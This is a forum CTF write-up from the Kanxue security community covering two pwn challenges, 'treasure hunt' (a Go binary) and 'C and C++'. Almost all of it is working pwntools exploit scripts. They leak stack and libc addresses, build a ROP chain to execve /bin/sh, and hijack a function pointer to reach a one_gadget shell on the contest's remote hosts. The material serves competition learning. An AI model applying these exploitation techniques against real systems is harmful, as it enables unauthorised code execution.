[原创]第8 第9题Writeup （队友代发）-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创]第8 第9题Writeup （队友代发）

2019-3-25 23:38 5014

[原创]第8 第9题Writeup （队友代发）

acdxvfsvd

2019-3-25 23:38

5014

8. 挖宝

Pwn
Go 1.6 Binary
Treasure4会往真的栈上写
预测Treasure4的位置，然后ROP

from pwn import *
from time import sleep
from ctypes import CDLL
import sys,os

context.arch = "amd64"

elf     = ELF("./trepwn")
libc     = ELF("./trelibc.so")
host     = "211.159.175.39"
port     = 8787
name_ptr= 0x489410
ret1    = 0xC820047CE0
padding = 'A'*0x30
cc    = False
endtime = 1
stackaddr =0
baseaddr = 0
libcaddr = 0
cacheaddr = 0

#io = process("./trepwn",env = {'LD_PRELOAD':'./trelibc.so'})

io = remote(host,port)

def mov(d):
    sleep(0.1)
    io.sendlineafter(")>>",d)
def msg(data):
    io.sendlineafter(">> ",data)



def pwn():
    global endtime
    global stackaddr
    global baseaddr
    global libcaddr
    global cacheaddr
    if endtime ==1:
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+'\xf8')#+p64(0XC820064250)+p64(0x200)+p64(0x200))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        stackaddr = addr
        endtime += 1 
        return
    if endtime ==2:
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(stackaddr+0x60))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        baseaddr = (addr-(0x55ff03397ee9-0x55ff032c0000 ))&0xfffffffffffff000
        info("base:0x%x",baseaddr)
        endtime +=1
        return
    if endtime ==3:
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(baseaddr+0x474ef0))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        libcaddr =addr -( 0x7f75ffa89950-0x7f75ff9f2000 )
        #io.interactive()
        info("libc:0x%x",libcaddr)
        endtime +=1
        return
    if endtime ==4:
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+'\x18')#+p64(0XC820064250)+p64(0x200)+p64(0x200))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        cacheaddr = addr
        endtime += 1 
        #io.interactive()
        return
    #io.interactive()

    if endtime ==5:
        #raw_input()
        syscall = 0x186600
        add_rsp = 0xd72f4
        rop = p64(baseaddr+syscall)
        rop += p64(add_rsp)
        rop += p64(59)
        rop += p64(libcaddr+next(libc.search("/bin/sh"),))
        rop += p64(0)*3
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(stackaddr-0xf8+0x38)+p64(0x30)*2+p64(0)*3+p64(1)+p64(0xcb4)+p64(cacheaddr)+p64(0x1)+p64(0x0)*2+rop)
        endtime+=1

        io.interactive()

    io.interactive()

#raw_input()
name = 'AAAA'
io.sendlineafter("Please input you name :\n",name)
#rand = callrand()

for i in range(5):
    mov('d')
#rand = callrand()
msg('1'*0x10)
info("Treasure 1 found")

for i in range(5):
    mov('w')
#rand = callrand()
msg('2'*0x10)
info("Treasure 2 found")

for i in range(5):
    mov('a')
#rand = callrand()
msg('3'*0x10)
info("Treasure 3 found")

mov('s');mov('d')
des = 'dsaw'

def mov_brute(d):
    io.sendlineafter(")>>",d)
    if "Cong" in io.recv(0x13):
        cc = True
        info("Treasure 4 found")
        pwn()
def loop():
    sleep(0.1)
    for de in des:
        for i in range(3):
            mov_brute(de)

cnt = 0
while True:
    loop()
    cnt=cnt+1
    if(cnt%20==0):
        cod = io.recv(4)
        info("loop %d cod %s"%(cnt,cod))

9. C与C++

Pwn
delete的时候会调一个函数指针，利用这个性质来实现任意地址执行

from pwn import *
#p = process('./candcpp')
p=remote('154.8.222.144', 9999)

p.recvuntil('name')
p.sendline(p64(0x400e10)+p64(0x4009a0))
def c_malloc(l,s):
    p.recvuntil('>>')
    p.sendline('1')
    p.recvuntil('string')
    p.sendline(str(l))
    p.recvuntil('string')
    p.send(s)

def c_free(idx):
    p.recvuntil('>>')
    p.sendline('2')
    p.recvuntil('string')
    p.sendline(str(idx))

def cpp_new(l,s):
    p.recvuntil('>>')
    p.sendline('3')
    p.recvuntil('string')
    p.sendline(str(l))
    p.recvuntil('string')
    p.send(s)

def cpp_dele(idx):
    p.recvuntil('>>')
    p.sendline('4')
    p.recvuntil('string')
    p.sendline(str(idx))

#c_malloc(0x2e,p64(0x401228)+p64(0)[:-1]+p64(0x401228)+p64(0)[:-1]+p64(0x401228)+'\n')
#c_malloc(0x2e,p64(0x401228)+p64(0)[:-1]+p64(0x401228)+p64(0)[:-1]+p64(0x401228)+'\n')
#c_malloc(0x2e,p64(0x401228)+p64(0)[:-1]+p64(0x401228)+p64(0)[:-1]+p64(0x401228)+'\n')

c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])+'\n')
c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])+'\n')
c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])+'\n')
#cpp_new(0x20,'AAAAA\n')
#cpp_new(0x20,'BBBBB\n')

c_malloc(0x100,(p64(0x401228)+p64(0x401228)[:-1])*18+'\n')
#cpp_new(0x100,'BBBBB\n')
c_malloc(0x100,(p64(0x602328+8)+p64(0x602328+8)[:-1])*9+(p64(0x602328)+p64(0x602328)[:-1])*6+'\n')
c_free(2)
c_free(1)
c_free(0)
#cpp_new(46,(p64(0x4008b0)+p64(0x4008b0)[:-1])*5+p64(0x4008b0)+'\n')
#cpp_new(0x8,'aaa\n')
#c_malloc(0x2e,(p64(0x401228)+p64(0)[:-1])*3+p64(3)+p64(0x4008b0)+'\n')
#cpp_dele(0)
c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])*15+'\n')
c_free(0)
c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])*15+'\n')

cpp_dele(0)
p.recvuntil('0x')
addr = int(p.recvuntil('\n')[:-1],16)
libc_base = addr - (0x7f1a7c683690-0x7f1a7c614000)
one = libc_base +0xf02a4
info("libc:0x%x",libc_base)
p.recvuntil('name')
p.sendline(p64(one))
c_free(4)
c_malloc(0x100,(p64(0x602328+8)+p64(0x602328+8)[:-1])*9+(p64(0x602328)+p64(0x602328)[:-1])*6+'\n')
cpp_dele(0)
p.interactive()

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・0

点赞・2

打赏